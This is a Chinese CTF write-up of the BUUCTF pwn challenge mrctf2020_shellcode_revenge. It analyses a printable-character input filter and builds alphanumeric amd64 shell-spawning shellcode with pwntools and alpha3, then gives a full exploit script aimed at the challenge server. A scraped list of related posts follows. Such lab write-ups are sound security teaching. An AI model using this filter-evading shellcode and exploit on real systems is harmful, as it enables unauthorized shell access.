[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)
mrctf2020_shellcode_revenge
- 例行检查,64位程序,开启了RELRO和PIE
- 本地运行看一下大概的情况
- 64位ida载入,没法f5,直接看汇编
jg大于则跳转,jl小于则跳转,jump无条件跳转
要让程序继续执行下去,肯定是跳转loc_11AC
loc_123A
loc_11B8
cdqe使用eax的最高位拓展rax高32位的所有位
movzx则是按无符号数传送+扩展(16-32)
EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低8位
大致就是将我们输入的字符串每一位进行比较,如果不在0x60~0x7A这个范围就跳转
剩下几个就是跳转的范围
理一下我们输入的字符大致限定在了(60,74)||(2f,5a)两个范围里
搜一下其他师傅的wp,说是这个叫string.printable,就是可见字符shellcode。这里使用alpha3就可以生成了。详细的看这位师傅的博客,我这边就直接根据他的介绍用了
下载alpha3
git clone https://github.com/TaQini/alpha3.git
用法
- 首先利用pwntools生成一个shellcode
from pwn import *context.arch='amd64'sc = asm(shellcraft.sh())
print sc
没法直接输出,有乱码,将shellcode重定向到一个文件中
切换到alpha3目录中,使用alpha3生成string.printable
cd alpha3
python ./ALPHA3.py x64 ascii mixedcase rax --input="存储shellcode的文件" > 输出文件
最后发送生成的shellcode即可
完整exp:
from pwn import *r = remote("node3.buuoj.cn",29334)
context(arch = 'amd64', os = 'linux', log_level = 'debug')
r.recvuntil("Show me your magic!\n")shellcode_64="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload=shellcode_64r.send(payload)
r.interactive()
参考wp:
https://www.cnblogs.com/chuj/p/14232150.html
https://blog.csdn.net/weixin_44145820/article/details/105565953
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)相关推荐
- [BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
[BUUCTF-pwn]--mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀. 不过这道题,刷新了我 ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode;调试计算
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按AS ...
- BUUCTF(pwn)starctf_2019_babyshell
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句. 所以我们 ...
- 持续更新 BUUCTF——PWN(三)
文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...
最新文章
- 每天一个linux命令-touch
- Python3 文件的重命名
- linux登oracle登陆不了,oracle: linux服务器本机不能登陆的解决
- 单例模式——懒汉模式(C++)
- [LOJ500]ZQC的拼图
- javaweb使用 数据库连接池 DBCP,实现对数据库驱动使用优化,多个 action共用一个数据库连接
- 中文整合包_案例 | 美研市场营销和整合营销专业1620Fall 580+申请实例(含MS+PHD)...
- android 点击空白退出,Android 点击空白处隐藏键盘
- 如何优雅的关闭 Spark Streaming 程序(2种思路)
- android listview 分析,android中ListView的定位:使用setSelectionFromTop
- php soap调用asp.net webservice
- 围棋人机大战属于计算机在什么方面的应用,《信息技术基础》第一章复习题库...
- [翻译] ASP.NET MVC Framework控制器操作安全性
- 【信息论】信息论基础知识
- 实施ERP系统后需要维护吗?
- 分享一个:批量下载个性化桌面壁纸和各种唯美图片的方法
- 全球与中国高氧潜水电脑市场深度研究分析报告
- 【你好,windows】Windows 10 20H2 19042.630专业工作站纯净版2020.12.1
- 【2022版】Java多线程与高并发面试题总结,108道题含答案解析。
- 无线Mesh网络技术基础与应用